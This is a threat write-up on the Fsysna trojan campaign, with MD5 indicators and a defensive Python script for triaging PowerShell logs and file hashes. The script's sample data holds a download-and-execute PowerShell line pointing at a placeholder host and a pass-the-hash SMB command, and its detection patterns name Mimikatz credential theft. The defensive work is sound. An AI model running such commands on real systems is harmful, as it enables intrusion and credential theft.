Fsysna is an advanced trojan being used in an ongoing cryptocurrency-mining and ransomware campaign.
The malware used in the attack consists of two variants of a trojan identified as “Trojan.Win32.Fsysna”, plus a variant of a Monero cryptominer.
The second variant performs the same actions as the first Fsysna variant, but also launches PowerShell scripts that execute Invoke-SMBClient, an open-source PowerShell SMB client, and Invoke-Cats, a script-based variant of the Mimikatz credential harvester. These are used to move laterally to other hosts. It then connects to a separate C2 server to download and install the intended payloads, and afterwards keeps a C2 connection open to control those payloads and collect system information.
It is unclear how the initial infection of an unprotected PC in a network occurs. Because the malware pairs Mimikatz with an SMB client, it does not need an unpatched host to spread: it harvests credentials from memory and reuses them over SMB, so it can move quickly across a network of fully patched systems wherever the stolen accounts are valid. Any network that has seen this activity should treat credentials on the affected hosts as compromised.
Indicators of Compromise
MD5 File Hashes
- 1c791ae1e8356395f0c4a9a4a8fb65e8 = znhcfvzxd.exe
- 59b18d6146a2aa066f661599c496090d = svchost.exe
- 5ab6f8ca1f22d88b8ef9a4e39fca0c03 = taskmgr.exe
- a4b7940b3d6b03269194f728610784d6 = wmiex.exe
- d4e2ebcf92cf1b2e759ff7ce1f5688ca = taskmgr.exe
- d81233988ec80f56ea4094bad7ab5814 = update.png
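The two things a responder most wants from this write-up are a check for the lateral-movement tooling in PowerShell script-block logs and a check of file hashes against the IoC list above. The script below is an added example written for this page, not tooling from the original report or from any vendor. It scans constructed script-block log lines for Invoke-SMBClient and Invoke-Cats (the `sekurlsa::logonpasswords` pattern is an added generic Mimikatz check, not something the report lists), and classifies constructed file entries by IoC hash and by whether a `svchost.exe` or `taskmgr.exe` sits outside the Windows directory. The sample log lines, paths, the `example.invalid` host and all non-IoC hashes are constructed placeholders.

```python
"""Triage helper for the Fsysna activity described above (added example).

1. Scan PowerShell script-block text (Event ID 4104 style) for the
   lateral-movement tooling named in the write-up.
2. Match file MD5s against the IoC list and flag Windows system binary
   names found outside the Windows directory.
All log lines and file entries below are constructed sample data.
"""
import hashlib
import re
from pathlib import PureWindowsPath

# MD5 IoCs from the write-up: hash -> file name seen in the campaign
IOC_MD5 = {
    "1c791ae1e8356395f0c4a9a4a8fb65e8": "znhcfvzxd.exe",
    "59b18d6146a2aa066f661599c496090d": "svchost.exe",
    "5ab6f8ca1f22d88b8ef9a4e39fca0c03": "taskmgr.exe",
    "a4b7940b3d6b03269194f728610784d6": "wmiex.exe",
    "d4e2ebcf92cf1b2e759ff7ce1f5688ca": "taskmgr.exe",
    "d81233988ec80f56ea4094bad7ab5814": "update.png",
}

# Names the campaign borrows from legitimate Windows binaries. A copy outside
# the Windows directory is worth a look even when the hash is not on the list.
MASQUERADED_NAMES = {"svchost.exe", "taskmgr.exe"}
WINDOWS_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")

# Script-block indicators. The two function names come from the write-up;
# the sekurlsa::logonpasswords string is an added generic Mimikatz check.
SCRIPT_PATTERNS = {
    "invoke_smbclient": re.compile(r"\bInvoke-SMBClient\b", re.I),
    "invoke_cats": re.compile(r"\bInvoke-Cats\b", re.I),
    "mimikatz_cmd": re.compile(r"sekurlsa::logonpasswords", re.I),
}


def scan_script_block(text):
    """Return the set of indicator names matched in one script-block event."""
    return {name for name, pat in SCRIPT_PATTERNS.items() if pat.search(text)}


def check_file(path, md5):
    """Classify one (path, md5) pair. Returns a list of reasons, empty if clean."""
    reasons = []
    md5 = md5.lower()
    if md5 in IOC_MD5:
        reasons.append("ioc_hash:" + IOC_MD5[md5])
    p = PureWindowsPath(path)
    parent = str(p.parent).lower()
    if p.name.lower() in MASQUERADED_NAMES and not parent.startswith(WINDOWS_DIRS):
        reasons.append("system_name_outside_windows_dir")
    return reasons


def md5_of(data):
    """MD5 of a byte string, for hashing files you read yourself."""
    return hashlib.md5(data).hexdigest()


def triage(script_blocks, files):
    """Run both checks and return {item: [reasons]} for everything that hit."""
    hits = {}
    for i, line in enumerate(script_blocks):
        found = scan_script_block(line)
        if found:
            hits[f"scriptblock[{i}]"] = sorted(found)
    for path, md5 in files:
        reasons = check_file(path, md5)
        if reasons:
            hits[path] = reasons
    return hits


# Constructed sample script-block lines (not real telemetry); the NTLM hash
# argument is a placeholder.
SAMPLE_SCRIPT_BLOCKS = [
    "Invoke-SMBClient -Domain CORP -Username admin "
    "-Hash 00000000000000000000000000000000 -Source 10.0.0.5 -Action List",
    "IEX (New-Object Net.WebClient).DownloadString("
    "'http://example.invalid/Invoke-Cats.ps1'); Invoke-Cats",
    "Get-ChildItem C:\\Users | Select-Object Name",
]

# Constructed (path, md5) pairs; the non-IoC hashes are placeholders.
SAMPLE_FILES = [
    ("C:\\Users\\Public\\svchost.exe", "59b18d6146a2aa066f661599c496090d"),
    ("C:\\Windows\\System32\\svchost.exe", "d41d8cd98f00b204e9800998ecf8427e"),
    ("C:\\ProgramData\\wmiex.exe", "a4b7940b3d6b03269194f728610784d6"),
    ("C:\\Temp\\taskmgr.exe", "d41d8cd98f00b204e9800998ecf8427e"),
]

if __name__ == "__main__":
    for item, reasons in triage(SAMPLE_SCRIPT_BLOCKS, SAMPLE_FILES).items():
        print(item, "->", ", ".join(reasons))
```

To use this on real data, feed `scan_script_block` the ScriptBlockText field of Event ID 4104 records and feed `check_file` paths with `md5_of(open(path, "rb").read())`. A hash match is definitive for the samples listed; the name-outside-Windows-directory check is a heuristic that catches renamed or repacked copies the hash list will miss, so review those hits rather than auto-blocking on them.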